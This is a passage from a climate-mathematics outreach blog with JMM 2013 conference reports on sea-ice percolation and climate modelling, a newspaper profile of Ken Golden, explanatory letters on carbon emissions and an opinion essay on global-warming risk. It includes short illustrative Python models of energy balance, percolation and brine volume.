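        """Global-mean energy balance: absorbed solar minus outgoing longwave, per unit heat capacity."""
        return (Q * (1.0 - albedo(T)) - EPS * SIGMA * T**4) / heat_capacity

    # Integrate from two different initial temperatures with forward Euler.
    dt = 86400.0 * 10     # 10-day time step, in seconds
    for T0 in (230.0, 300.0):
        T = T0
        for _ in range(20000):
            T += dt * dT_dt(T)
        print(f"start {T0:.0f} K  ->  equilibrium near {T:.1f} K")
    # The two runs settle on different equilibria (roughly 250 K and 287 K here):
    # a Snowball-like cold state and a warm state, i.e. bistability from ice-albedo feedback.
    ```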

    We hope you’ll join us in continuing to beta-test the materials, and that you will send us suggestions for improvements and additions, and tell us about our typos! You can send feedback to info@mathclimate.org.

    Posted in Climate Modeling, Conference Report | 1 Comment

    From the JMM — Porter Lecture by Prof. Ken Golden

    On the closing afternoon of the Joint Meetings of the AMS and the MAA in San Diego, the attendees were treated to a fascinating talk by Kenneth Golden (from the University of Utah), who gave this year’s Gerald and Judith Porter Public Lecture, entitled “Mathematics and the melting polar ice caps”.

    Ken was introduced by MAA president Paul Zorn, who explained that the Porter Public Lectures really are intended for the public, not just mathematicians. Paul told us a little about Ken’s long fascination with, and fundamental work on, the polar ice, based not only on theoretical mathematics but also on important experiments that have taken him on expeditions to the Earth’s polar regions 15 times now, often accompanied by graduate and undergraduate students, who gain practical, life-changing experience as well as mathematical knowledge.

    Paul mentioned that Ken had been the subject of an article the day before in the San Diego Union-Tribune, where the reporter had compared Ken to “Indiana Jones”; obligingly, that film’s theme music heralded Ken’s appearance on the podium, which drew a chuckle from the audience.

    Ken started by stating that, yes, our climate is changing, and that, probably, the most dramatic changes are taking place at the poles. He reminded the audience of the evidence based on the satellite data from 1979 to 2000 showing how the Arctic sea ice summer minimum had fallen dramatically below the average sea ice minimum during that period, but he pointed out something evident from the data that most of us didn’t know: The observed decreases in the minimum Arctic sea ice were very much greater than what all of the accepted models predicted, which showed that something was missing in the current models.

    Ken pointed out that it wasn’t just polar bears and walruses that care about sea ice, but oil companies and, eventually, all of us. After all, the cryosphere (the part of the Earth’s surface that is covered with ice) makes up 7-10% of the surface of the Earth, and anything that affects it is very likely to affect the rest of the planet in a series of ripple effects that could induce dramatic changes in the climate of the whole Earth. For example, having much of the sea ice melt increases the danger that the land ice sheets over Greenland and Antarctica will also experience significant melting, which would raise sea levels around the world. As Ken said, sea ice is not just an indicator, it’s a major player in governing the world’s climate.

    Ken then introduced his major mathematical themes visually by exhibiting photographs of sea ice at a wide range of scales, from sub-millimeter to more than 100 kilometers, pointing out that sea ice, far from being a homogeneous medium, has complicated structures at all scales, and understanding how these interact and induce macroscopic properties that can be incorporated into global-scale climate models is a fundamental challenge that has been the focus of his work and that of his students.

    His point was that, while at first glance sea ice looks like a barren, frozen, impermeable cap, it’s really a complex, porous composite material, whose structure is strongly affected by the amount of brine (i.e., salty water) in the ice; the brine forms micro-channels that support percolation effects and generate an astonishing array of phenomena, interacting strongly not only with physical processes but with biological processes as well. For example, salt water transport brings nutrients into the ice to feed the algae, which feed the krill, which feed the whales, and so on.

    The main part of the talk that followed explored how mathematical concepts such as percolation theory, composite materials, fractals, statistical physics, and multi-scale homogenization (a set of techniques for approximating complicated local composite structures by more homogeneous models, which can help incorporate some of the properties generated by the local structures into models at higher scales) have entered into his work and allowed him to make discoveries that have greatly expanded our ability to model what is happening to the sea ice in the polar regions.
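
    Percolation theory is the part of this story that translates most directly into a few lines of code. The sketch below is a toy illustration of the threshold idea on a 2D square lattice, not Golden’s sea-ice model: each site is “open” with probability p, and we ask how often an open path crosses from top to bottom. The lattice size, the number of trials, and the use of scipy’s connected-component labelling are choices made purely for this example.

    ```python
    import numpy as np
    from scipy.ndimage import label

    def percolates(p, n=100, rng=None):
        """Return True if open sites connect the top row to the bottom row of an n x n lattice."""
        if rng is None:
            rng = np.random.default_rng()
        open_sites = rng.random((n, n)) < p          # each site open with probability p
        labels, _ = label(open_sites)                # 4-connected clusters of open sites
        top, bottom = set(labels[0]) - {0}, set(labels[-1]) - {0}
        return bool(top & bottom)                    # does some cluster touch both edges?

    rng = np.random.default_rng(1)
    for p in (0.45, 0.55, 0.60, 0.65):
        hits = sum(percolates(p, rng=rng) for _ in range(50))
        print(f"p = {p:.2f}: spanning cluster in {hits}/50 trials")
    # The crossing probability jumps sharply near p ~ 0.59 (the 2D site-percolation threshold),
    # the same kind of on/off behaviour that governs when brine can flow through sea ice.
    ```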

    As exciting as it was to see how formerly exotic and abstract concepts such as fractal dimensions enter into these practical models, an equally exciting part of the story was Ken’s experimental work, which had taken him on polar expeditions a total of 15 times so far, had given him a chance to do very fundamental experiments, and had also allowed him to engage undergraduates and graduate students in fundamental research. He told some great stories about his students in Utah who had become intrigued with his work and wound up doing creative, original work AND had had the chance to go on polar expeditions as well.

    Another of his main themes was that the power of mathematics was in its cross-pollination of different areas, that concepts developed in one area turn out to have applications in many other areas, and he convincingly demonstrated this by giving many examples that had come up in his research.

    Ken finished by premiering a truly entertaining and informative video of his most recent polar expedition, his 15th, to study sea ice around Antarctica, at the end of which he was roundly applauded.

    The audience left with a deep appreciation not only of the importance of understanding the challenges that climate change poses for us, and of the crucial role mathematics has to play, but also of the power of enthusiasm and dedication to teaching and research to make a difference in people’s lives.

    Robert L. Bryant, Director
    Mathematical Sciences Research Institute
    17 Gauss Way
    Berkeley, CA 94720-5070
    MSRI
    bryant@msri.org

    Posted in Cryosphere, General, Public Event | 2 Comments

    Mathematician stepping on thin ice

    From U-T San Diego, Saturday, January 12, 2013

    With a resume of scientific discoveries, and a track record of harrowing Antarctic adventures, University of Utah mathematician Ken Golden has stepped out of the ivory tower and onto thin ice.

    Golden, a speaker at this week’s national mathematics conference at the San Diego Convention Center, will give a lecture today on polar ice, a topic that has led him to the ends of the earth, and just barely back again. Over the past three decades, he’s traveled on seven voyages to Antarctica and eight to the Arctic, applying his expertise in theoretical mathematics and composite materials to questions about brine inclusions in sea ice, and the role of surface “melt ponds” on the rate of ice loss.

    “Our mathematical results on how fluid flows through sea ice are currently being used in climate models of sea ice,” he said.
    Along the way he retraced the route of the ill-fated 1914 Shackleton expedition, survived a ship fire after an engine explosion, and spent two weeks stranded on an iced-in vessel last fall. To Golden, the thrill of discovery outweighed the dangers of polar travel.
    “It’s like a different planet,” he said. “It’s one of the most fascinating places on earth. It’s one thing to sit in your office and prove theorems about a complicated system. It’s another thing to go down there yourself. It informs my mathematics.”

    As a kind of mathematical Indiana Jones, Golden has achieved a rock star status rare among academics. The prestigious research journal Science ran a profile of Golden in 2009. Fans lined up for autographs at the conference this week, and are expected to fill his lecture: one of two public events at the mostly technical conference. “Never in my wildest dreams did I imagine I’d be a math professor signing autographs,” Golden said.

    Golden first traveled to Antarctica during his senior year in college, along the Drake Passage, a route that Irish explorer Ernest Shackleton pioneered in 1914, after his ship was crushed by sea ice. Shackleton made the rescue trek in an open boat, but Golden said the journey was gut-wrenching even on a modern ship. “I have very vivid memories of crossing the Drake Passage, one of the stormiest seas in the world, and taking 50-degree rolls,” he said.

    Golden earned a PhD in mathematics at New York University, and landed in a professorship at the University of Utah, before returning to the realm of ice. He nearly relived Shackleton’s plight on his subsequent voyage in 1998 after the ship’s engine was destroyed in a fire. Crews sounded the emergency alarm, and then announced they were lowering the lifeboats, Golden said. “It’s not what you want to hear when you’re in the Antarctic ice pack,” he said. After five days on the ice, crews jury-rigged a backup engine and the vessel limped home, he said.

    Not dissuaded by the mishap, Golden joined subsequent expeditions to the poles, during which he described breakthroughs in ice equations.
    Standing on the ice during a howling Arctic storm one night, he noticed the ground around him turning to slush, and realized “in one particular epiphany” that the ice was reaching a percolation threshold, through which brine could flow freely.
    His research on the phenomenon led to his “rule of fives,” which describes the combination of temperature, salinity and saturation at which ice becomes permeable, and helps explain how ice sheets grow.
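
    The article does not spell out the formula behind the “rule of fives,” so the sketch below uses the commonly cited Frankenstein-Garner (1967) approximation for the brine volume fraction of sea ice as an illustration; treat the coefficients and the 5% permeability threshold as assumptions of this example rather than as Golden’s own equations.

    ```python
    def brine_volume_fraction(temp_c, salinity_ppt):
        """Frankenstein-Garner (1967) approximation for sea-ice brine volume fraction.

        temp_c       : ice temperature in degrees Celsius (roughly -22.9 <= T <= -0.5)
        salinity_ppt : bulk ice salinity in parts per thousand
        """
        if not -22.9 <= temp_c <= -0.5:
            raise ValueError("approximation is only valid for -22.9 C <= T <= -0.5 C")
        return (salinity_ppt / 1000.0) * (49.185 / abs(temp_c) + 0.532)

    # "Rule of fives": near -5 C and 5 ppt salinity the brine fraction reaches about 5%,
    # the threshold above which columnar sea ice becomes permeable to fluid flow.
    for temp in (-10.0, -5.0, -2.0):
        vb = brine_volume_fraction(temp, 5.0)
        status = "permeable" if vb > 0.05 else "impermeable"
        print(f"T = {temp:5.1f} C, S = 5 ppt  ->  brine fraction {vb:.1%} ({status})")
    ```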

    Golden’s other studies examine the role of “melt pools” in ice, which allow ice to melt faster by reducing the heat reflected.
    “Sea ice goes from pure white snow, to a complex, evolving mosaic of ice, snow and meltwater,” Golden said.
    Studying that phenomenon can quantify the overall reflectiveness of the sea ice pack, he said, helping close some gaps in current ice melt models.

    “Mathematics is normally rather esoteric, but Ken’s work is very applied, and it’s applied to the topic of sea ice, which is of great interest today due to climate change,” said his colleague, Ian Eisenman, a professor of climate science and physical oceanography at Scripps Institution of Oceanography. “I think his work in general is very exciting not only for fellow scientists, but also for the general public.”

    Posted in Conference Report, Cryosphere, General, Public Event | 3 Comments

    From the JMM — A Meteorologist’s View

    I am attending the Joint Mathematics Meetings in San Diego, where I was convinced to help organize a special session on environmental mathematics focused on evaluating past climate changes and modeling future variations. I am a meteorologist by training and a climate scientist by virtue of spending the past 35 years doing research in observing and understanding climate variability. (This may surprise people from CICS and ESSIC, who know me almost solely as a manager, but I still think of myself as a scientist!) I have been intrigued by the differences between this meeting and the other large national meetings that I generally attend – the Fall Meeting of the American Geophysical Union in San Francisco and the Annual Meeting of the American Meteorological Society, which is always in mid-winter in various southern or west coast cities, Austin, Texas, this year.

    AGU is known for quick turnaround talks, generally 15 minutes. AGU was the first of these big meetings to place computers in every room and to manage presentations centrally – authors bring their memory sticks to the speaker ready room, upload the presentations onto servers, check them, and when the time comes for the session everything is ready. AGU also schedules sessions so that cherry-picking interesting talks in different rooms is possible (not easy, but possible). The AMetSoc meetings have adopted the same centralized system for handling presentations, and similar scheduling. The Joint Mathematics Meetings organizers don’t seem to have made that transition just yet, and so the first of our two sessions, held on Thursday morning, was a bit like going back in time – we used the personal MacBook of one of the organizers, with the power cord of one of the others. Each talk was uploaded either before the session began (at 8:00 am) or between talks. The most entertaining part was adjusting the size of the projected version of the first speaker’s talk – he began by living with the outer edges of his slides being cut off, but eventually we needed to solve the issue. As usual, one of the younger audience members was the problem solver – it had something to do with “mirroring” in PowerPoint.

    The session went very well, once the technical issues were straightened out. Several presentations dealt with the fine details of how small scale processes are handled in climate models. In most cases, the speakers went into mathematical detail that escaped me, but all were very convincing, and the 30 minute time slots made for a more enjoyable pace in my opinion. I particularly enjoyed the last two talks, which focused on aspects of large-scale climate. Prof. Langford from the University of Guelph in Ontario described a simple model of Hadley Cell variations, relating it both to current events and to the climate of tens of millions of years ago. Prof. Boos from Yale University discussed monsoon circulations and their relationship to nearby desert regions. These two talks were the most interesting to me personally, but all of the presentations would have been well received in either AGU or the other AMS. The second part of our special session will be Saturday morning, also beginning at 8am.

    Phillip Arkin, Director
    Cooperative Institute for Climate and Satellites (CICS)
    Earth System Science Interdisciplinary Center (ESSIC)
    University of Maryland
    parkin@essic.umd.edu

    Posted in Conference Report, General | Leave a comment

    Dear my imaginary teenage sister,

    I was thrilled to get your last letter. I’m glad to see you are looking at some of the references I sent you last time. Figuring out who is responsible for higher atmospheric carbon levels and how to respond to climate change can be difficult. First, let’s talk about where the carbon is coming from.

    Some of my mathematical research tries to show that we need to stop adding carbon to the atmosphere, so I have a couple of specific ideas for you to think about. One of the pieces of evidence I study is the Keeling curve, which is the upward curve of measured carbon in the atmosphere. The measurements are taken in Hawaii. (Pretty sweet location, right?) Well, scientists and mathematicians have actually figured out that we can determine where the carbon was released, even though the measurements are taken in just one place [1]. So we can conclusively know which area of the world added the carbon to the atmosphere. The kicker is that most of the carbon is from industrialized nations like the U.S.A. and China. In 2000, the U.S.A. added more carbon to the atmosphere than any other country on Earth. I’ve attached a clever map I found of the world where each country is scaled based on that country’s carbon emissions in 2000 [2].

    See how big the U.S.A. is? As Americans, I think it’s our responsibility to fix some of what we caused. Sadly, my research alone will not solve the problem of global warming. But there are lots of real things that anyone can do to decrease the amount of salt they add to the batter.

    So, to answer your second question: Yes! There are lots of ways that you can help. The IPCC reports that lifestyle choices “can contribute to climate change mitigation across all sectors” by decreasing GHG emissions [3]. There are these two guys, Robert Socolow and Stephen Pacala, who present 15 ways to reduce GHG emissions, any 7 of which would hold carbon emissions constant [4]. They are things like decreasing the amount of energy you use in your home by 25% or using more wind power. Stuff our society already knows how to do. You might try to convince your school to recycle more, put up solar panels or use energy-efficient air conditioners the next time they remodel. You could also drive less…

    So I agree with your idol, Miley Cyrus, when she says we need to “wake up America” [5]. I think we need to start passing laws and legislation to decrease the amount of greenhouse gases we are emitting and put money into developing new, greener technology. We are putting too much carbon in the atmosphere and the scientists aren’t sure what’s going to happen. We don’t know how much carbon is too much and we don’t have a good way to pull it back out of the atmosphere. (Remember the salty pancake analogy from my last letter?) Thus we, as a society, need to put some serious thought into the problem. The good news is there are actions you can take that we already know will help.

    Love, Samantha

    Samantha Oestreicher
    oestr042@umn.edu

    PS- As always, if you have any more questions, then please send them my way.

    [1] Buermann, Wolfgang, Benjamin Lintner, Charles Koven, Alon Angert, Compton Tucker, and Inez Fung, “The changing carbon cycle at Mauna Loa Observatory,” PNAS, vol. 104, no. 11, www.pnas.org/cgi/doi/10.1073/pnas.0611224104, March 13, 2007.
    [2] SASI Group and Mark Newman, “Map 295,” University of Michigan and University of Sheffield, www.worldmapper.org, 2006.
    [3] Solomon et al., “Summary for Policymakers,” IPCC, Fourth Assessment Report, Working Group 3, 2007, pg 12.
    [4] Socolow, Robert, and Stephen Pacala, “A plan to keep carbon in check,” Scientific American, Sept 2006.
    [5] Cyrus, Miley. “Wake up America.” Lyrics. Breakout. Hollywood Records, 2008.

    Posted in Climate, General | Leave a comment

    From the JMM — A view from the other AMS (Am. Meteorological Soc.)

    In January I am normally in a southern US city attending the American Meteorological Society annual meeting. This week, I am in San Diego attending a different AMS – the American Mathematical Society Joint Mathematics Meetings. I am helping to organize a special session on environmental mathematics during which mathematicians and environmental scientists describe methods for modeling and observing climate. Our session is a part of Mathematics of Planet Earth 2013 (MPE2013), a joint effort of more than 100 scientific societies, universities, research institutes, and organizations all over the world. A number of sessions and invited addresses at this meeting are devoted to the topic.

    While the attendance here seems large, it is very unlike the other AMS for me in that I know few of the attendees, and so I find it easy to sit in on sessions and actually pay attention to the content. This morning I listened to several talks on integrating the mathematics of planet earth into college mathematics curricula. I came away with the impression that the large amount of data and analyses available makes climate an outstanding virtual laboratory for introducing students to the use of mathematics in the “wild.” I was impressed with the wide range of topics and tools that these faculty members were introducing their undergraduate students to. In one case, students were expected to learn and use MATLAB (something I have been unable to do myself, sadly), and by the end of the course to run experiments using the Weather Research and Forecasting (WRF) model.

    Emily Shuckburgh of the British Antarctic Survey presented an invited address on “Using mathematics to better understand the Earth’s climate.” She began with a fairly elementary tutorial on the factors that control the Earth’s surface temperature, showing how simple math can provide insight into the factors that lead to changes in climate and how feedbacks get involved. She moved on to describe atmospheric and oceanic modeling and the role of eddies, which seems to be a particular focus of her research, and tied that to field work in the Southern Ocean and Antarctica in which she has participated.

    Tomorrow morning is the first of the two parts of our special session, and since one of our speakers was unable to come I need to prepare something to fill that gap. I will try to report again tomorrow on our session and other interesting events.

    Phillip Arkin, Director
    Cooperative Institute for Climate and Satellites (CICS)
    Earth System Science Interdisciplinary Center (ESSIC)
    University of Maryland
    parkin@essic.umd.edu

    Posted in Conference Report, General | Leave a comment

    From the JMM — Dr. Emily Shuckburgh’s Invited Address

    Dr. Emily Shuckburgh, the leader of the Open Oceans research group at the British Antarctic Survey, gave a terrific talk on the mathematics of climate science here in San Diego on the opening day (January 9) of the Joint Mathematics Meetings of the American Mathematical Society and the Mathematical Association of America.

    Emily’s talk was entitled “Using mathematics to better understand the Earth’s climate.” She was introduced by Christiane Rousseau, who gave us a great preview of the other MPE2013 activities still to come at the JMM. (You can see the full list here.)

    One of Emily’s main points was that basic physics and simple mathematical models go a long way towards explaining the Earth’s overall surface temperature, but that more sophisticated concepts from dynamical systems and differential equations are important in modeling the finer features that we need to understand in order to get a picture of the changing climate. Her other main point, just as important, was that mathematics alone is not enough; you have to have a good understanding of the underlying physics of the Earth’s climate system to help you understand what is important to model.

    She started with the 1827 work of Fourier, whose simplest model of the Sun-Earth system, ignoring the atmosphere and just using black-body radiation and the Stefan-Boltzmann law, predicts an average temperature of 255 kelvin ($-18\,^{\circ}\mathrm{C}$), whereas the actual observed temperature is about 288 kelvin ($15\,^{\circ}\mathrm{C}$). (A temperature difference of one kelvin (K) equals one degree Celsius.) She then put in a simple model for the atmosphere’s transmission and absorption of radiation (ignoring convection) and showed that the prediction becomes 286 kelvin, which is remarkably close to the observations for such a simple model. Of course, two degrees on a planetary scale is still quite significant for us humans trying to live on Earth!
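
    The two headline numbers are easy to reproduce in a few lines. The sketch below redoes the back-of-the-envelope calculation: a bare black-body planet with Earth’s albedo, and then a single partially absorbing atmospheric layer. The solar constant, the albedo, and the layer emissivity (chosen here so the answer lands near the observed value) are textbook-style assumptions, not the exact numbers from Emily’s talk.

    ```python
    SIGMA = 5.670e-8        # Stefan-Boltzmann constant, W m^-2 K^-4
    S0 = 1361.0             # solar constant, W m^-2
    ALBEDO = 0.30           # planetary albedo

    # Fourier-style bare planet: absorbed solar equals emitted infrared.
    absorbed = S0 * (1.0 - ALBEDO) / 4.0           # incoming sunlight spread over the sphere
    T_bare = (absorbed / SIGMA) ** 0.25
    print(f"bare planet: {T_bare:.0f} K")          # about 255 K (-18 C)

    # One partially absorbing atmospheric layer with infrared emissivity eps.
    # Balancing the surface and layer energy budgets gives
    # T_surface = T_bare * (2 / (2 - eps)) ** 0.25.
    eps = 0.77                                     # illustrative value, tuned to land near 287 K
    T_surface = T_bare * (2.0 / (2.0 - eps)) ** 0.25
    print(f"with a simple greenhouse layer: {T_surface:.0f} K")   # close to the observed ~288 K
    ```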

    Emily went on to point out that the calculations were based on the known absorption/radiation characteristics of the atmosphere, which would change if the composition of the atmosphere changed, in particular, if the percentage of carbon dioxide in the atmosphere were to change. She showed us how sensitive the Earth’s climate is to this by giving us a short tour of what is known about the historical correlation between the carbon in the atmosphere and the Earth’s average temperature, a history based on ice cores that cover the past 800,000 years. This bore out the model’s effectiveness and showed how robust the calculations are while, at the same time, pointing out how important it is to know the level of greenhouse gases in the atmosphere.

    She pointed out that the correlation doesn’t say anything about causation, because, while increasing the carbon in the atmosphere would increase the predicted temperature, increasing the temperature would, according to our models, most likely increase the amount of carbon in the atmosphere.

    To understand the dynamics, it’s very important to understand how heat is transported around on the Earth’s surface, particularly from the equator to the poles. (After all, there’s a lot of ice at the poles, but moving a lot of heat there is likely to cause dramatic melting.) So Emily then went on to describe the models of this transport, using basic Navier-Stokes models, first for the atmosphere and then for the oceans.

    This is where her presentation became even more interesting. Even for the ‘simpler’ atmosphere problem, the rotation of the Earth causes instabilities to form in the solutions to the fluid convection equations, leading to such phenomena as the jet streams and the boundary instabilities that she described as ‘eddies’ (aka ‘swirly patterns’, roughly 1000 km in size) that can drive heat flux and help transport heat from the equator to the poles. She then described the eddies in the ocean system (which are much smaller, around 25 km in size, but still very important for a good model); this is a much greater challenge, because numerically you have to have a much, much finer grid to get the necessary resolution.
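
    A rough count of grid cells shows why resolving the ocean eddies is so much more demanding than resolving the atmospheric ones. The assumption of about four grid points per eddy diameter is made purely for this comparison and is not a statement about any particular model.

    ```python
    EARTH_AREA_KM2 = 5.1e8          # surface area of the Earth, km^2

    def horizontal_grid_cells(eddy_size_km, points_per_eddy=4):
        """Horizontal cells needed if the grid spacing is eddy_size / points_per_eddy."""
        spacing = eddy_size_km / points_per_eddy
        return EARTH_AREA_KM2 / spacing**2

    atm = horizontal_grid_cells(1000.0)    # ~1000 km atmospheric eddies
    ocn = horizontal_grid_cells(25.0)      # ~25 km ocean eddies
    print(f"atmosphere: ~{atm:.1e} cells, ocean: ~{ocn:.1e} cells "
          f"({ocn/atm:.0f}x more, before counting vertical levels and shorter time steps)")
    ```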

    The dynamical systems that then show up, both in models and in observations, become very interesting. Of course, no one can solve them explicitly, but known dynamical features such as KAM tori do show up and form barriers to mixing, so there’s the challenge of understanding the interaction of the regimes of strong and weak mixing. It was amazing and illuminating to see how these basic ideas from dynamical systems come into play in understanding the models and in motivating the scientific observations that need to be made in order to improve our models.

    Emily went on to describe some of her own theoretical and observational work in developing and testing models of how the ocean currents, particularly around Antarctica, are distributing heat and what some of the likely effects will be on a warming planet.

    She concluded with some sobering statistics about what might happen to our climate if atmospheric carbon continues to rise, and pointed out that we are NOT on track to rein in the human contribution to atmospheric carbon. We are therefore potentially on the verge of climate regimes that we have not seen in human history, with serious potential for rapid and dangerous climate change.

    At the conclusion of this exciting talk, the audience showed its appreciation by giving her a rather long ovation, and we all left with a much better understanding of the mathematical and political/social challenges we face.

    Robert L. Bryant, Director
    Mathematical Sciences Research Institute
    17 Gauss Way
    Berkeley, CA 94720-5070
    MSRI
    bryant@msri.org

    Posted in Climate, General, Public Event | 1 Comment

    US Launch of MPE2013 today at JMM!

    Today is the official US launch of Mathematics of Planet Earth 2013 at the Joint Mathematics Meetings, with a special celebration at the Open House of the Institutes this Wednesday at 5:30 p.m. It is an excellent opportunity to recall the North-American origin of MPE2013. Here, we all share a passion for mathematics. Most probably, we also share a passion for nature and our planet. MPE2013 is an opportunity to bring our two passions together.

    I had the idea of MPE2013 in 2009, a dream, on a long training day on my cross-country skis that left me plenty of time to sketch its main characteristics: an extremely broad and important theme, an exceptional opportunity for collaboration between mathematicians and researchers from other scientific disciplines, and a great theme for outreach to the public and the schools. The next Monday, I shared the idea with the directors of the Canadian institutes and we immediately wrote a one-page draft of the project. By the end of the week, the draft was sent to the directors of the North-American institutes. A few minutes later, at 6:00 a.m. Berkeley time, the first answer, from MSRI, arrived and, by the end of the day, nine American institutes had agreed to go. It was then time for hard work. So I take this opportunity to thank all my American colleagues who have worked so hard for MPE2013, especially Brian Conrey, Director of the American Institute of Mathematics, and Mary Lou Zeeman of Bowdoin College.

    In 2010, I was asked for information about MPE2013 by David Wallace, Director of the Isaac Newton Institute (UK), and by Cédric Villani, Director of the Institut Henri Poincaré (Paris). We immediately decided to open the initiative to the world. MPE2013 was announced at the General Assembly of the International Mathematical Union in Bangalore in 2010, and at the meeting of the institutes’ directors at ICM 2010.

    The American Institute of Mathematics (AIM) was instrumental in giving a great impulse to MPE2013 by bringing people together for two organizational workshops in Palo Alto, in March 2011 and March 2012. The first workshop concentrated on the planning of long-term programs and workshops, while the second included the planning of meetings and outreach activities.

    The 2013 Joint Mathematics Meetings will start brilliantly with a plenary lecture by Emily Shuckburgh and end, no less brilliantly, with the Porter Lecture by Ken Golden. Both Emily and Ken incorporate field work in their research and have spent significant periods of time in Antarctica. Have you already learned that the structure of sea ice is very different from that of regular ice? Ken is a specialist in sea ice. He spent the fall of 2012 in Antarctica, studying ice and what we can learn from it.

    My dream is now shared with so many people that MPE is developing on its own. Since the international launch on December 7, 2012, no fewer than 20 new partners have joined. In parallel to the MPE blog chaired by Hans Kaper, a French blog with MPE nuggets started on January 1. The spirit of MPE2013, including the exceptional collaboration at the world level, is here to last.

    Christiane Rousseau, International Coordinator of MPE2013

    Posted in General, Public Event | Leave a comment

    Dear my little (well not so little anymore!) imaginary teenage sister,

    Doing your school research paper on climate change sounds like a great idea! Let me see if I can get you started. I’ll even put a few references at the end in case you want to look those up for your school report. (hint hint!)

    First, I totally agree, popular culture is becoming inundated with the buzz words “green,” “ecofriendly,” and “global warming,” but I’m not sure society is explaining things to you very well. You have some really good questions about what global warming means. Even your pop idol, Miley Cyrus, is singing “Everything I read is global warming, going green, I don’t know what all this means…” [1]. And if she doesn’t get it, then why should the adults expect you to understand? The truth is, no one really knows all the answers about the problem. The climate is really complicated and scientists don’t always get things right on the first try. It takes them a little while to figure something out, just like it takes you a little while to learn something new. (Remember all those cooking failures when you were young?) But we do know a LOT about climate change. And we do know that something needs to change or we may be in some serious trouble.

    Okay, let’s talk about scientist lingo. The scientists who wrote the IPCC (Intergovernmental Panel on Climate Change) report say, “A global assessment of data since 1970 has shown it is likely that anthropogenic warming has had a discernible influence on many physical and biological systems” [2]. So, what does that mean? The report is saying that it’s likely that humans are affecting the world around us. There is even a note that clarifies: ‘likely’ means 66-90%. So we may, or may not, be affecting the global climate. Well, if that isn’t vague I don’t know what is! But, maybe, just maybe, the statement has to be vague. There were “more than 2500 scientific expert reviewers, more than 800 contributing authors, and more than 450 lead authors” who worked on writing the IPCC report [3]. Okay, so you know how you and I can’t always agree? We are only 2 people. Now, imagine trying to get 800+ people to all agree on the same thing. It would be impossible! All of a sudden that range of 66-90% is looking a little more reasonable. No matter what, all the scientists think it’s more than 50% likely that we, humans, are changing the climate. We are affecting our planet. (Well, there are people who think climate change is not our fault, but if a person can’t believe 800 of the top scientists who all agree, then do we really want to believe them?) The real problem that we should be worrying about is that we don’t know what’s going to happen to Earth under our influence. This is what the scientists are currently arguing about. What can we expect from the climate? What should we do?

    Now, imagine you are making pancakes. (It sounds random but just trust me for a minute, okay?) If you add too much salt, then your pancakes start to taste funny. But a couple extra grains aren’t going to make a difference. However, there is some critical mass of salt which ruins the pancakes. And you can’t just take the salt out once it’s mixed up! The pancakes are ruined and you have to start over. This is what we are doing to our atmosphere. Only, we are adding extra carbon and other GHGs (greenhouse gases) to the mix instead of salt. In our atmosphere carbon is measured in parts per million, or ppm, instead of teaspoons.

    So how much salt is supposed to be in our climate pancakes? Pre-industrial levels of carbon were around 275 ppm. This is going to be our baseline recipe value. We know from this cool science which uses really old ice that Earth has had atmospheric carbon values between 180 and 280 ppm for the last 800,000 years. We also know that global temperature is closely correlated to carbon levels [4]. The scientists from the IPCC think it’s “very likely” that GHGs, including carbon, are the cause of global warming (very likely means 90-99%) [5]. We now have 400 ppm instead of the baseline of 275 ppm! Our batter is getting pretty salty. Eww! Salty enough that the scientists are starting to wish we could throw it out and start over. But we only have one planet and one atmosphere. We can’t throw it out and start over. How much more salt are we willing to dump in our mixing bowl and still eat the pancakes?

    Love, Samantha

    Samantha Oestreicher
    oestr042@umn.edu

    PS- Let me know if you have any further questions I can help with!

    [1] Cyrus, Miley. “Wake up America.” Lyrics. Breakout. Hollywood Records, 2008.
    [2] Solomon et al., “Summary for Policymakers,” IPCC, Fourth Assessment Report, Working Group 2, 2007, pg 9.
    [3] Press flyer announcing IPCC AR4; http://www.ipcc.ch/pdf/press-ar4/ipcc-flyer-low.pdf
    [4] Solomon et al., “Summary for Policymakers,” IPCC, Fourth Assessment Report, Working Group 1, 2007, pg 3.
    [5] Solomon et al., “Technical Summary,” IPCC, Fourth Assessment Report, Working Group 1, 2007, pg 24.

    Posted in Climate, General | 1 Comment

    Global Warming, Climate Change, Climate Research

    It is often the case that at the end of one of my talks about some aspect of climate research or about the development of tools for the analysis of climate I get asked questions regarding global warming: whether global warming is “happening,” or whether the claims on either side of the issue are true or false. Or, more to the point, I am asked whether we should or should not be concerned about warming. I know full well that my answers to this line of questioning are never satisfying; sometimes this is purposely so. I do have something to say about global warming and global change, but it is nothing more than a personal opinion, that of a concerned citizen rather than of an expert on this issue.

    I have taken the time and the effort to examine the data used by others to demonstrate a global warming trend, and I understand how these data have been processed and what challenges are involved in making the analyses. The upshot is that I have not seen any data or analysis that demonstrates that warming is not occurring. Like the myriad of people who work on global climate trends, I also see a very significant correlation between human activities and warming, one that makes the industrial-era warming trend unlike any other change in climate before it. Further, I have not seen any reason to conclude that the best and most authoritative scientists working on global warming trends would not readily modify their conclusions if they were presented with data that show a different picture of what’s happening.

    The idea that climatologists and the governments that fund them have a self-interest in promulgating global warming is childish and yet amazingly distracting, even to thoughtful people: besides the fact that not all climatologists are climate change experts, “climate” is a natural phenomenon, whether it is warming or not, and thus climate scientists will always have something to study. If anyone has a self-interest in what climate does, however, it is those whose livelihood is affected by the state of climate itself, the groups from which most of the people who use this line of thinking come. This is not a laughing matter: half a century of opposition to anything nuclear has had the effect of seriously slowing down research into the safe use of nuclear energy sources. I was not keen on how the nuclear industry does its business, but to nearly kill nuclear research was a terrible thing: we lost precious time in finding ways to use the stuff safely.

    So what’s the fuss over a little bit of warming? If you live in the South West of the US, as I do, you are familiar with pre-Columbian communities that disappeared because of sudden drought, or post-Columbian communities that were wiped out not by war but by the rapid introduction of new diseases.

    The main reason I cannot give you more than a personal opinion on the implications of global warming is that it is a risk analysis problem and this is not within the range of my expertise, not by a mile: sure, the more we know about climate dynamics, the more informed any risk analysis decision is. But that I know a little bit of probability theory and a little bit of climate dynamics is not adequate, just as someone who might know something about probability and know how to design cars will be poorly equipped to design liability insurance instruments.

    There are parallels with the risk analysis problem associated with cigarette smoking: in the climate problem there is compelling correlation between human activities and global warming. There is a compelling correlation between cigarette smoking and some forms of cancer; but to date, no one knows exactly how cigarettes cause cancer. The causation relation between human activities (burning hydrocarbons, among other things) and global warming is not fully understood either. Decisions need to be made now (we cannot wait to know everything on climate). In the cigarette case, actions were taken to curb smoking, because the risk analysis made it clear that it was better to curb smoking than not. No one waited for the causation mechanism to be fully elucidated.

